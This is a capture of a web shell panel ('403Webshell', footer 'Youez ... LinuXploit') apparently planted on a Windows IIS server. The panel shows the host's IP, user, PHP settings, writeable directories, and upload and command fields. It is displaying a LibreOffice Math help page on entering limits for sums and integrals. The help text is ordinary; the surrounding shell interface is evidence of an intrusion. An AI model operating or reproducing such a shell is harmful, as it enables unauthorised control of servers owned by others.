403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.59
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/LibreOffice/help/en-US/text/smath/guide/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/LibreOffice/help/en-US/text/smath/guide/limits.html
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
<base href="../../../../">
<noscript><meta http-equiv="refresh" content="0; URL=../../../../en-US/noscript.html"></noscript>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Working with Limits</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="en-US/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="en-US/bookmarks.js" defer></script><script type="text/javascript" src="en-US/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="en-US/text/shared/05/new_help.html"><div></div></a><a class="logo" href="en-US/text/shared/05/new_help.html"><p dir="auto">LibreOffice 24.2 Help</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Module</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contents</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Search in bookmarks for chosen module" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<a name="bm_id8404492"></a><meta itemprop="keywords" content="limits,in sums/integrals">
<meta itemprop="keywords" content="integral limits">

<h1 id="hd_id1892147" dir="auto">
<a name="limits"></a>Working with Limits</h1>
<h3 id="hd_id9881893" dir="auto">How can I define the limits in a Sum or Integral formula?</h3>
<p id="par_id6504409" class="paragraph" dir="auto">You want to insert a summation formula like "summation of s^k from k = 0 to n" at the cursor in a Writer text document.</p>
<ol itemprop="HowTo" itemscope="true" itemtype="http://schema.org/HowToSection" dir="auto">
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id8811304" class="paragraph" dir="auto">Choose <span class="menuitem">Insert - OLE Object - Formula Object</span>.</p>
<p id="par_id1276589" class="paragraph" dir="auto">You see the Math input window and the Elements pane on the left.</p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id3283791" class="paragraph" dir="auto">From the list on the upper part of the Elements pane, select the <span class="emph">Operators</span> item.</p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id9734794" class="paragraph" dir="auto">In the lower part of the Elements pane, click the <span class="emph">Sum</span> icon.</p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id9641712" class="paragraph" dir="auto">To enable lower and upper limits, click additionally the <span class="emph">Upper and Lower Limits</span> icon.</p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id3304239" class="paragraph" dir="auto">In the input window, the first placeholder or marker is selected, and you can start to enter the lower limit: </p>
<p id="par_id8679158" class="smathcode" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">k = 0</span></p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id8471327" class="paragraph" dir="auto">Press F4 to advance to the next marker, and enter the upper limit:</p>
<p id="par_id4731894" class="smathcode" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">n</span></p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id759300" class="paragraph" dir="auto">Press F4 to advance to the next marker, and enter the summand:</p>
<p id="par_id651875" class="smathcode" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">s^k</span></p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id6756187" class="paragraph" dir="auto">Now the formula is complete. Click into your text document outside the formula to leave the formula editor.</p>
</li>
</ol>
<p id="par_id9406414" class="paragraph" dir="auto">In the same way, you can enter an Integral formula with limits. When you click an icon from the Elements pane, the assigned text command is inserted in the input window. If you know the text commands, you can enter the commands directly in the input window.</p>
<ol itemprop="HowTo" itemscope="true" itemtype="http://schema.org/HowToSection" dir="auto">
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id5866267" class="paragraph" dir="auto">Choose <span class="menuitem">Insert - OLE Object - Formula Object</span>.</p>
</li>
<li itemprop="itemListElement" itemscope="true" itemtype="http://schema.org/HowToStep" dir="auto">
<p id="par_id1965697" class="paragraph" dir="auto">Click in the input window and enter the following line:</p>
<p id="par_id9004486" class="smathcode" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">int from{a} to{b} f(x)`dx</span></p>
<p id="par_id4651020" class="paragraph" dir="auto">A small gap exists between f(x) and dx, which you can also enter using the Elements pane: select the <span class="emph">Formats</span> item from the list on the top, then the <span class="emph">Small Gap</span> icon.</p>
</li>
</ol>
<div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id3877071" dir="auto">If you don't like the font of the letters f and x, choose <span class="menuitem">Format - Fonts</span> and select other fonts. Click the <span class="emph">Default</span> button to use the new fonts as default from now on.</p></div>
</div>
<br>
<div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="tip" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id3021332" dir="auto">If you need the formula within a line of text, the limits increase the line height. You can choose <span class="menuitem">Format - Text Mode</span> to place the limits besides the Sum or Integral symbol, which reduces the line height.</p></div>
</div>
<br>
<a name="relatedtopics"></a><div class="relatedtopics">
<p class="related" itemprop="mentions" dir="auto"><a name="related"></a><span class="emph">Related Topics</span>
</p>
<div class="relatedbody" itemprop="mentions">
<p id="par_id260322" class="paragraph" dir="auto"><a target="_top" href="en-US/text/smath/01/03090909.html">Example of Integral and Sum ranges</a></p>
</div>
</div>
</div>
<div id="DonationFrame"></div>
<footer><div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/smath/guide/limits.xhp" target="_blank">/text/smath/guide/limits.xhp</a></p>
<p dir="auto">Title is: Working with Limits</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit